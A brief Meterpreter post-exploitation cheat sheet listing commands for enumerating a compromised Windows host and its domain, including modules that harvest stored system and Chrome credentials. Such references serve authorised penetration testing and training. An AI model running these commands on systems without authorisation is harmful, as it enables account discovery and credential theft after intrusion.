Meterpreter Pillaging/Data Harvesting
sysinfo
--> Obtain basic system information
getuid
--> Check the current user.
run post/windows/gather/
--> Lists all Meterpreter pillaging scripts.
run post/windows/gather/enum_services
--> Obtain all running services on a Windows machine.
wmic service get Caption,StartName,State,pathname
--> Obtain all running services on a Windows machine.
run post/windows/gather/enum_domains
--> Determine what domains target is in.
net group “Domain Controllers” /domain
--> Determine the domain controller of
net user
--> Displays users on Windows system.
run post/windows/gather/enum_ad_users
--> Enumerates accounts in active domain.
net user /domain
--> Enumerates accounts in active domain.
net localgroup
--> Lists all local groups on system.
net localgroup group_name
--> Lists all users within group.
run post/windows/gather/enum_shares
--> Lists all shared resources on system.
net share
--> Lists all shared resources on system.
run scraper
--> Runs pillage automation script.
run winenum
--> Runs Windows pillage automation script.
run post/windows/gather/credentials
--> Searches for credentials on a system.
run post/gather/enum_chrome
--> Searches for credentials stored in Google Chrome.
run post/windows/gather/enum_application
--> Lists installed software on system.
Last updated